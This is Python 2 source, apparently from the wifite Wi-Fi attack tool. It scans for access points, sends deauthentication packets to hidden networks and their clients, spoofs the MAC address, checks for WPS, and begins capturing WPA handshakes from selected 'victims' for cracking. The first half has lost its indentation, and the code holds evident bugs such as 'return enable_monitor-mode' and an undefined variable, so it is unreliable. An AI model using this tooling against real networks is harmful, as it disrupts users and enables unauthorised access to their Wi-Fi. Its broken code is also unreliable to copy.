PRINTED_SCANNING = False
def get_iface():
"""
Get the wireless interface in monitor mode.
Defaults to only device in monitor mode if found.
Otherwise, enumerates list of possible wifi devices
and asks user to select one to put into monitor mode (if multiple).
Uses airmon-ng to put device in monitor mode if needed.
Returns the name (string) of the interface chosen in monitor mode.
"""
global PRINTED_SCANNING
if not PRINTED_SCANNING:
print GR+' [+]'+W+' scanning for wireless devices...'
PRINTED_SCANNING = True
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
iface = ''
monitors = []
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue
if ord(line[0]) != 32: # Doesn't start with space
iface = line[:line.find(' ')] # is the interface
if line.find('Mode:Monitor') != -1:
monitors.append(iface)
if WIRELESS_IFACE != '':
if monitors.count(WIRELESS_IFACE): return WIRELESS_IFACE
print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+WIRELESS_IFACE+O+'"'+W)
if len(monitors) == 1:
return monitors[0] # Default to only device in monitor mode
elif len(monitors) > 1:
print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
for i, monitor in enumerate(monitors):
print " %s. %s" % (G+str(i+1)+W, G+monitor+W)
ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, W, G, len(monitors), W, G))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
(GR, W, G, len(monitors), W, G))
i = int(ri)
return monitors[i - 1]
proc = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0 or line.startswith('Interface'): continue
#monitors.append(line[:line.find('\t')])
monitors.append(line)
if len(monitors) == 0:
print R+' [!]'+O+" no wireless interfaces were found."+W
print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
exit_gracefully(0)
elif WIRELESS_IFACE != '' and monitors.count(WIRELESS_IFACE) > 0:
mac_anonymize(monitor)
return enable_monitor-mode
elif len(monitors) == 1:
monitor = monitors[0][:monitors[0].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
print GR+" [+]"+W+" available wireless devices:"
for i, monitor in enumerate(monitors):
print " %s%d%s. %s" % (G, i + 1, W, monitor)
ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
i = int(ri)
monitor = monitors[i-1][:monitors[i-1].find('\t')]
mac_anonymize(monitor)
return enable_monitor_mode(monitor)
######################
# SCANNING FUNCTIONS #
######################
def scan(channel=0, iface='', tried_rtl8187_fix=False):
"""
Scans for access points. Asks user to select target(s).
"channel" - the channel to scan on, 0 scans all channels.
"iface" - the interface to scan on. must be a real interface.
"tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
Returns list of selected targets and list of clients.
"""
remove_airodump_files(temp + 'wifite')
command = ['airodump-ng',
'-a', # only show associated clients
'-w', temp + 'wifite'] # output file
if channel != 0:
command.append('-c')
command.append(str(channel))
command.append(iface)
proc = Popen(command, stdout=DN, stderr=DN)
time_started = time.time()
print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
(targets, clients) = ([], [])
try:
deauth_sent = 0.0
old_targets = []
stop_scanning = False
while True:
time.sleep(0.3)
if not os.path.exists(temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
print R+'\n [!] ERROR!'+W
# RTL8187 Unknown Error 132 FIX
if proc.poll() != None: # Check if process has finished
proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
if rtl8187_fix(iface):
return scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
exit_gracefully(1)
(targets, clients) = parse_csv(temp + 'wifite-01.csv')
# If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
if TARGET_ESSID != '':
for t in targets:
if t.ssid.lower() == TARGET_ESSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
if TARGET_BSSID != '':
for t in targets:
if t.bssid.lower() == TARGET_BSSID.lower():
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
targets = [t]
stop_scanning = True
break
# If user has chosen to target all access points, wait 20 seconds, then return all
if ATTACK_ALL_TARGETS and time.time() - time_started > 10:
print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
stop_scanning = True
if ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
# Remove targets with power < threshold
i = 0
before_count = len(targets)
while i < len(targets):
if targets[i].power < ATTACK_MIN_POWER:
targets.pop(i)
else: i += 1
print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
(G+str(before_count - len(targets))+W, ATTACK_MIN_POWER, G+str(len(targets))+W)
stop_scanning = True
if stop_scanning: break
# If there are unknown SSIDs, send deauths to them.
if channel != 0 and time.time() - deauth_sent > 5:
deauth_sent = time.time()
for t in targets:
if t.ssid == '':
print "\r %s deauthing hidden access point (%s) \r" % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
stdout.flush()
# Time to deauth
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', t.bssid]
for c in clients:
if c.station == t.bssid:
cmd.append('-c')
cmd.append(c.bssid)
break
cmd.append(iface)
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
proc_aireplay.wait()
time.sleep(0.5)
else:
for ot in old_targets:
if ot.ssid == '' and ot.bssid == t.bssid:
print '\r %s successfully decloaked "%s" ' % \
(GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)
old_targets = targets[:]
if VERBOSE_APS and len(targets) > 0:
targets = sorted(targets, key=lambda t: t.power, reverse=True)
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap', verbose=False)
os.system('clear')
print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
print ''
print ' %s %s wireless networks. %s target%s and %s client%s found \r' % (
GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W,
G+str(len(targets))+W, '' if len(targets) == 1 else 's',
G+str(len(clients))+W, '' if len(clients) == 1 else 's'),
stdout.flush()
except KeyboardInterrupt:
pass
print ''
send_interrupt(proc)
try: os.kill(proc.pid, SIGTERM)
except OSError: pass
except UnboundLocalError: pass
# Use "wash" program to check for WPS compatibility
if not WPS_DISABLE:
wps_check_targets(targets, temp + 'wifite-01.cap')
remove_airodump_files(temp + 'wifite')
if stop_scanning: return (targets, clients)
print ''
if len(targets) == 0:
print R+' [!]'+O+' no targets found!'+W
print R+' [!]'+O+' you may need to wait for targets to show up.'+W
print ''
exit_gracefully(1)
if VERBOSE_APS: os.system('clear')
# Sort by Power
targets = sorted(targets, key=lambda t: t.power, reverse=True)
victims = []
print " NUM ESSID %sCH ENCR POWER WPS? CLIENT" % ('BSSID ' if SHOW_MAC_IN_SCAN else '')
print ' --- -------------------- %s-- ---- ----- ---- ------' % ('----------------- ' if SHOW_MAC_IN_SCAN else '')
for i, target in enumerate(targets):
print " %s%2d%s " % (G, i + 1, W),
# SSID
if target.ssid == '':
p = O+'('+target.bssid+')'+GR+' '+W
print '%s' % p.ljust(20),
elif ( target.ssid.count('\x00') == len(target.ssid) ):
p = '<Length '+str(len(target.ssid))+'>'
print '%s' % C+p.ljust(20)+W,
elif len(target.ssid) <= 20:
print "%s" % C+target.ssid.ljust(20)+W,
else:
print "%s" % C+target.ssid[0:17] + '...'+W,
# BSSID
if SHOW_MAC_IN_SCAN:
print O,target.bssid+W,
# Channel
print G+target.channel.rjust(3),W,
# Encryption
if target.encryption.find("WEP") != -1: print G,
else: print O,
print "\b%3s" % target.encryption.strip().ljust(4) + W,
# Power
if target.power >= 55: col = G
elif target.power >= 40: col = O
else: col = R
print "%s%3ddb%s" % (col,target.power, W),
# WPS
if WPS_DISABLE:
print " %3s" % (O+'n/a'+W),
else:
print " %3s" % (G+'wps'+W if target.wps else R+' no'+W),
# Clients
client_text = ''
for c in clients:
if c.station == target.bssid:
if client_text == '': client_text = 'client'
elif client_text[-1] != "s": client_text += "s"
if client_text != '': print ' %s' % (G+client_text+W)
else: print ''
ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
" separated by commas, or '%s': " % (G+'all'+W))
if ri.strip().lower() == 'all':
victims = targets[:]
else:
for r in ri.split(','):
r = r.strip()
if r.find('-') != -1:
(sx, sy) = r.split('-')
if sx.isdigit() and sy.isdigit():
x = int(sx)
y = int(sy) + 1
for v in xrange(x, y):
victims.append(targets[v - 1])
elif not r.isdigit() and r.strip() != '':
print O+" [!]"+R+" not a number: %s " % (O+r+W)
elif r != '':
victims.append(targets[int(r) - 1])
if len(victims) == 0:
print O+'\n [!] '+R+'no targets selected.\n'+W
exit_gracefully(0)
print ''
print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')
return (victims, clients)
def parse_csv(filename):
    """
    Parses the given airodump-ng CSV dump into access points and clients.
    Returns tuple (targets, clients); both empty when the file is missing
    or unreadable.
    """
    if not os.path.exists(filename): return ([], [])
    try:
        f = open(filename, 'r')
        lines = f.read().split('\n')
        f.close()
    except IOError: return ([], [])
    in_client_section = False
    targets = []
    clients = []
    for line in lines:
        # The 'Station MAC,' header separates APs from connected clients.
        if line.startswith('Station MAC,'):
            in_client_section = True
        if line.startswith('BSSID') or line.startswith('Station MAC') or line.strip() == '':
            continue
        if in_client_section:
            # Connected-client rows
            fields = line.split(', ')
            if len(fields) < 6: continue
            bssid = re.sub(r'[^a-zA-Z0-9:]', '', fields[0])
            station = re.sub(r'[^a-zA-Z0-9:]', '', fields[5])
            power = fields[3]
            if station != 'notassociated':
                clients.append(Client(bssid, station, power))
        else:
            # Access-point rows
            fields = line.split(', ', 13)
            if len(fields) <= 11: continue
            # Column 11 usually holds the SSID length; shift by one when
            # an extra comma pushed it over.
            idx = 11
            fields[idx] = fields[idx].strip()
            if not fields[idx].isdigit(): idx += 1
            if idx > len(fields) - 1: continue
            ssidlen = int(fields[idx])
            ssid = fields[idx+1][:ssidlen]
            power = int(fields[idx-4])
            if power < 0: power += 100
            enc = fields[5]
            # Ignore non-WPA/WEP networks.
            if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
            if WEP_DISABLE and enc.find('WEP') != -1: continue
            if WPA_DISABLE and WPS_DISABLE and enc.find('WPA') != -1: continue
            enc = enc.strip()[:4]
            targets.append(Target(fields[0], power, fields[idx-2].strip(), fields[3], enc, ssid))
    return (targets, clients)
def wps_check_targets(targets, cap_file, verbose=True):
"""
Uses reaver's "walsh" (or wash) program to check access points in cap_file
for WPS functionality. Sets "wps" field of targets that match to True.
"""
global WPS_DISABLE
if not program_exists('walsh') and not program_exists('wash'):
WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
return
program_name = 'walsh' if program_exists('walsh') else 'wash'
if len(targets) == 0 or not os.path.exists(cap_file): return
if verbose:
print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
stdout.flush()
cmd = [program_name,
'-f', cap_file,
'-C'] # ignore Frame Check Sum errors
proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
proc_walsh.wait()
for line in proc_walsh.communicate()[0].split('\n'):
if line.strip() == '' or line.startswith('Scanning for'): continue
bssid = line.split(' ')[0]
for t in targets:
if t.bssid.lower() == bssid.lower():
t.wps = True
if verbose:
print 'done'
removed = 0
if not WPS_DISABLE and WPA_DISABLE:
i = 0
while i < len(targets):
if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
removed += 1
targets.pop(i)
else: i += 1
if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)
def rtl8187_fix(iface):
    """
    Attempts to solve "Unknown error 132" common with RTL8187 devices.
    Puts down interface, unloads/reloads driver module, then puts iface back up.
    Returns True if fix was attempted, False otherwise.
    """
    # Check if current interface is using the RTL8187 chipset
    proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
    proc_airmon.wait()
    using_rtl8187 = False
    for line in proc_airmon.communicate()[0].split():
        line = line.upper()
        if line.strip() == '' or line.startswith('INTERFACE'): continue
        # NOTE(review): 'line.find(iface.upper())' is truthy for ANY index
        # except 0 -- including -1 (not found) -- so in practice this only
        # requires 'RTL8187' somewhere in the output; confirm intended.
        if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True
    if not using_rtl8187:
        # Not an RTL8187 device: report a generic airodump failure and exit.
        print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
        print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
        exit_gracefully(1)
    print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."
    original_iface = iface
    # Take device out of monitor mode
    airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
    airmon.wait()
    # The last usable line of airmon-ng output names the base interface.
    for line in airmon.communicate()[0].split('\n'):
        if line.strip() == '' or \
           line.startswith("Interface") or \
           line.find('(removed)') != -1:
            continue
        original_iface = line.split()[0] # line[:line.find('\t')]
    # Remove drive modules, block/unblock ifaces, probe new modules.
    print_and_exec(['ifconfig', original_iface, 'down'])
    print_and_exec(['rmmod', 'rtl8187'])
    print_and_exec(['rfkill', 'block', 'all'])
    print_and_exec(['rfkill', 'unblock', 'all'])
    print_and_exec(['modprobe', 'rtl8187'])
    print_and_exec(['ifconfig', original_iface, 'up'])
    print_and_exec(['airmon-ng', 'start', original_iface])
    # Clear the status line left behind by print_and_exec().
    print '\r \r',
    print O+' [!] '+W+'restarting scan...\n'
    return True
def print_and_exec(cmd):
    """
    Prints and executes command "cmd" (a list of argv strings), then
    sleeps briefly (0.1 sec) so the output is readable.
    Used by rtl8187_fix (for prettiness).
    Command output is discarded (sent to DN, the null device).
    """
    # Blank out the current console line before printing the command
    print '\r \r',
    stdout.flush()
    print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
    stdout.flush()
    call(cmd, stdout=DN, stderr=DN)
    time.sleep(0.1)
####################
# HELPER FUNCTIONS #
####################
def remove_airodump_files(prefix):
    """
    Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
    Used by wpa_get_handshake() and attack_wep().
    Also sweeps stray .xor keystream files out of the temp directory and the
    current directory, and aireplay-ng 'replay_*.cap' files from the cwd.
    """
    # airodump-ng's first-run output files all carry the "-01" suffix
    for suffix in ('-01.cap', '-01.csv', '-01.kismet.csv', '-01.kismet.netxml'):
        remove_file(prefix + suffix)
    # keystream (.xor) files left in the temp directory
    for filename in os.listdir(temp):
        if filename.lower().endswith('.xor'): remove_file(temp + filename)
    # replay captures and keystreams that aireplay-ng drops into the cwd
    for filename in os.listdir('.'):
        if filename.startswith('replay_') and filename.endswith('.cap'):
            remove_file(filename)
        if filename.endswith('.xor'): remove_file(filename)
def remove_file(filename):
    """
    Attempts to delete 'filename' from disk.
    Missing files (or any other OSError) are silently ignored.
    """
    try:
        os.remove(filename)
    except OSError:
        pass
def program_exists(program):
    """
    Uses 'which' (linux command) to check if a program is installed.
    Returns True when 'which' prints a path with no error output,
    False otherwise.
    """
    proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
    out, err = proc.communicate()
    stripped_out = out.strip()
    stripped_err = err.strip()
    if stripped_out == '' and stripped_err == '':
        return False  # no output at all: program not found
    if stripped_out != '' and stripped_err == '':
        return True   # a path was printed cleanly: program found
    # 'which' complained on stderr; "no X in <path>" means not installed
    return not (stripped_err == '' or err.find('no %s in' % program) != -1)
def sec_to_hms(sec):
    """
    Converts a number of seconds to '[h:mm:ss]' display format.
    Negative values are treated as an endless timer.
    """
    if sec <= -1: return '[endless]'
    hours, remainder = divmod(sec, 3600)
    minutes, seconds = divmod(remainder, 60)
    return '[%d:%02d:%02d]' % (hours, minutes, seconds)
def send_interrupt(process):
    """
    Sends the interrupt signal (SIGINT) to the given process's PID.
    Every failure mode is silently ignored: the process may already be
    dead (OSError), have a bogus pid (TypeError), be undefined
    (UnboundLocalError), or be None (AttributeError).
    """
    try:
        os.kill(process.pid, SIGINT)
    except (OSError, TypeError, UnboundLocalError, AttributeError):
        pass  # nothing to kill, or nothing we are able to kill
def get_mac_address(iface):
    """
    Returns the MAC address shown on the first line of `ifconfig iface`.
    Dashes are normalized to colons; anything past 17 chars is trimmed.
    Returns '' when no candidate token is found.
    """
    proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
    proc.wait()
    header = proc.communicate()[0].split('\n')[0]
    # the MAC is the last non-empty token on ifconfig's first line
    mac = ''
    for token in header.split(' '):
        if token != '':
            mac = token
    mac = mac.replace('-', ':')
    if len(mac) > 17:
        mac = mac[:17]
    return mac
def generate_random_mac(old_mac):
    """
    Generates a random MAC address, keeping the vendor prefix
    (first three octets, old_mac[0:8]) of the old MAC address.
    Returns a lowercase string: old_mac[0:8] + ':XX:XX:XX'
    where each X is a random hex digit.
    """
    random.seed()
    hexdigits = '0123456789abcdef'
    new_mac = old_mac[:8].lower().replace('-', ':')
    for _ in range(3):
        new_mac += ':' + random.choice(hexdigits) + random.choice(hexdigits)
    # Extremely unlikely, but never hand back the exact same address.
    if new_mac == old_mac:
        new_mac = generate_random_mac(old_mac)
    return new_mac
def mac_anonymize(iface):
    """
    Changes MAC address of 'iface' to a random MAC.
    Only randomizes the last 6 hex digits, so the vendor prefix stays the same.
    Stores the interface and its old MAC in the global ORIGINAL_IFACE_MAC so
    mac_change_back() can restore it later.
    No-op when DO_NOT_CHANGE_MAC is set or ifconfig is unavailable.
    """
    global ORIGINAL_IFACE_MAC
    if DO_NOT_CHANGE_MAC: return
    if not program_exists('ifconfig'): return
    # Store old (current) MAC address: last non-empty token on ifconfig's
    # first output line.
    # NOTE(review): if ifconfig prints nothing, 'old_mac' is never bound and
    # the tuple assignment below raises UnboundLocalError -- confirm callers
    # only reach here with a valid interface.
    proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
    proc.wait()
    for word in proc.communicate()[0].split('\n')[0].split(' '):
        if word != '': old_mac = word
    ORIGINAL_IFACE_MAC = (iface, old_mac)
    new_mac = generate_random_mac(old_mac)
    # the interface must be down before the hardware address can be changed
    call(['ifconfig', iface, 'down'])
    print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
    stdout.flush()
    proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
    proc.wait()
    call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
    print 'done'
def mac_change_back():
    """
    Changes MAC address back to what it was before attacks began.
    Uses the (iface, mac) pair stored in the global ORIGINAL_IFACE_MAC by
    mac_anonymize(); does nothing when no MAC was spoofed.
    """
    iface = ORIGINAL_IFACE_MAC[0]
    old_mac = ORIGINAL_IFACE_MAC[1]
    if iface == '' or old_mac == '': return
    print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
    stdout.flush()
    # interface must be down to change the hardware address
    call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
    proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
    proc.wait()
    call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
    print "done"
def analyze_capfile(capfile):
    """
    Analyzes given capfile for handshakes using various programs
    (pyrit, cowpatty, tshark, aircrack-ng). Prints results to console.
    Requires the TARGET_BSSID and/or TARGET_ESSID globals; tries to guess
    the missing one from the capture itself.
    Always terminates the program via exit_gracefully(0).
    """
    global TARGET_BSSID, TARGET_ESSID
    if TARGET_ESSID == '' and TARGET_BSSID == '':
        print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
        print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
        print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
        # exit_gracefully(1)
    if TARGET_BSSID == '':
        # Get the first BSSID found in tshark!
        TARGET_BSSID = get_bssid_from_cap(TARGET_ESSID, capfile)
        # if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
        if TARGET_BSSID == '':
            print R+' [!]'+O+' unable to guess BSSID from ESSID!'
        else:
            print GR+' [+]'+W+' guessed bssid: %s' % (G+TARGET_BSSID+W)
    if TARGET_BSSID != '' and TARGET_ESSID == '':
        TARGET_ESSID = get_essid_from_cap(TARGET_BSSID, capfile)
    print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)
    # Build a minimal WPA Target: only bssid/essid matter for these checks
    t = Target(TARGET_BSSID, '', '', '', 'WPA', TARGET_ESSID)
    # Run every available handshake verifier and report each verdict
    if program_exists('pyrit'):
        result = has_handshake_pyrit(t, capfile)
        print GR+' [+]'+W+' '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: pyrit'
    if program_exists('cowpatty'):
        # cowpatty is run twice on purpose: lenient and strict modes
        result = has_handshake_cowpatty(t, capfile, nonstrict=True)
        print GR+' [+]'+W+' '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
        result = has_handshake_cowpatty(t, capfile, nonstrict=False)
        print GR+' [+]'+W+' '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: cowpatty'
    if program_exists('tshark'):
        result = has_handshake_tshark(t, capfile)
        print GR+' [+]'+W+' '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: tshark'
    if program_exists('aircrack-ng'):
        result = has_handshake_aircrack(t, capfile)
        print GR+' [+]'+W+' '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: aircrack-ng'
    print ''
    exit_gracefully(0)
def get_essid_from_cap(bssid, capfile):
    """
    Attempts to get ESSID from cap file using BSSID as reference.
    Filters the capture for probe responses (subtype 0x05) sent by the
    BSSID and pulls the SSID out of tshark's summary line.
    Returns '' if not found or if tshark is unavailable.
    """
    if not program_exists('tshark'): return ''
    cmd = ['tshark',
           '-r', capfile,
           '-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid,
           '-n']
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    for line in proc.communicate()[0].split('\n'):
        if line.find('SSID=') != -1:
            # everything after 'SSID=' on the summary line is the network name
            essid = line[line.find('SSID=')+5:]
            print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
            return essid
    print R+' [!]'+O+' unable to guess essid!'+W
    return ''
def get_bssid_from_cap(essid, capfile):
    """
    Returns first BSSID of access point found in cap file.
    This is not accurate at all, but it's a good guess.
    First tries to match the ESSID against probe responses; failing that,
    falls back to the AP-side address of any EAPOL handshake messages.
    Returns '' if not found.
    """
    global TARGET_ESSID
    if not program_exists('tshark'): return ''
    # Attempt to get BSSID based on ESSID
    if essid != '':
        cmd = ['tshark',
               '-r', capfile,
               '-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
               '-n', # Do not resolve MAC vendor names
               '-T', 'fields', # Only display certain fields
               '-e', 'wlan.sa'] # source MAC address
        proc = Popen(cmd, stdout=PIPE, stderr=DN)
        proc.wait()
        bssid = proc.communicate()[0].split('\n')[0]
        if bssid != '': return bssid
    # Fallback: scan EAPOL packets and take the AP side of the exchange
    cmd = ['tshark',
           '-r', capfile,
           '-R', 'eapol',
           '-n']
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    for line in proc.communicate()[0].split('\n'):
        if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
            # messages 1 and 3 travel AP -> client: the source is the BSSID
            while line.startswith(' ') or line.startswith('\t'): line = line[1:]
            line = line.replace('\t', ' ')
            while line.find('  ') != -1: line = line.replace('  ', ' ')
            return line.split(' ')[2]
        elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
            # messages 2 and 4 travel client -> AP: the destination is the BSSID
            while line.startswith(' ') or line.startswith('\t'): line = line[1:]
            line = line.replace('\t', ' ')
            while line.find('  ') != -1: line = line.replace('  ', ' ')
            return line.split(' ')[4]
    return ''
def exit_gracefully(code=0):
    """
    We may exit the program at any time.
    We want to remove the temp folder and any files contained within it.
    Removes the temp files/folder and exits with error code "code".
    Also disables monitor mode (if we enabled it) and restores the original
    MAC address (if we spoofed it).
    """
    # Remove temp files and folder
    if os.path.exists(temp):
        for file in os.listdir(temp):
            os.remove(temp + file)
        os.rmdir(temp)
    # Disable monitor mode if enabled by us
    disable_monitor_mode()
    # Change MAC address back if spoofed
    mac_change_back()
    print GR+" [+]"+W+" quitting" # wifite will now exit"
    print ''
    # GTFO
    exit(code)
def attack_interrupted_prompt():
    """
    Prompts user to decide if they want to exit,
    skip to cracking WPA handshakes,
    or continue attacking the remaining targets (if applicable).
    Returns True if user chose to exit completely, False otherwise.
    Side effect: sets the global TARGETS_REMAINING to -1 when the user
    skips ahead to cracking.
    """
    global TARGETS_REMAINING
    should_we_exit = False
    # If there are more targets to attack, ask what to do next
    if TARGETS_REMAINING > 0:
        options = ''
        print GR+"\n [+] %s%d%s target%s remain%s" % (G, TARGETS_REMAINING, W,
                            '' if TARGETS_REMAINING == 1 else 's',
                            's' if TARGETS_REMAINING == 1 else '')
        print GR+" [+]"+W+" what do you want to do?"
        options += G+'c'+W
        print G+"     [c]ontinue"+W+" attacking targets"
        # only offer 's'kip when there are captured handshakes to crack
        if len(WPA_CAPS_TO_CRACK) > 0:
            options += W+', '+O+'s'+W
            print O+"     [s]kip"+W+" to cracking WPA cap files"
        options += W+', or '+R+'e'+W
        print R+"     [e]xit"+W+" completely"
        ri = ''
        while ri != 'c' and ri != 's' and ri != 'e':
            ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
        if ri == 's':
            TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
        elif ri == 'e':
            should_we_exit = True
    return should_we_exit
#################
# WPA FUNCTIONS #
#################
def wpa_get_handshake(iface, target, clients):
    """
    Opens an airodump capture on the target, dumping to a file.
    During the capture, sends deauthentication packets to the target both as
    general deauthentication packets and specific packets aimed at connected clients.
    Waits until a handshake is captured.
        "iface"   - interface to capture on
        "target"  - Target object containing info on access point
        "clients" - List of Client objects associated with the target
    Returns True if handshake was found, False otherwise.
    On success the capture is saved under WPA_HANDSHAKE_DIR and queued in
    WPA_CAPS_TO_CRACK for later cracking.
    """
    global TARGETS_REMAINING, WPA_ATTACK_TIMEOUT
    # A non-positive timeout means "wait forever"
    if WPA_ATTACK_TIMEOUT <= 0: WPA_ATTACK_TIMEOUT = -1
    # Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
    save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
              + '_' + target.bssid.replace(':', '-') + '.cap'
    # Check if we already have a handshake for this SSID... If we do, generate a new filename
    save_index = 0
    while os.path.exists(save_as):
        save_index += 1
        save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
                  + '_' + target.bssid.replace(':', '-') \
                  + '_' + str(save_index) + '.cap'
    # Remove previous airodump output files (if needed)
    remove_airodump_files(temp + 'wpa')
    # Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
    try:
        # Start airodump-ng process to capture handshakes
        cmd = ['airodump-ng',
               '-w', temp + 'wpa',
               '-c', target.channel,
               '--bssid', target.bssid, iface]
        proc_read = Popen(cmd, stdout=DN, stderr=DN)
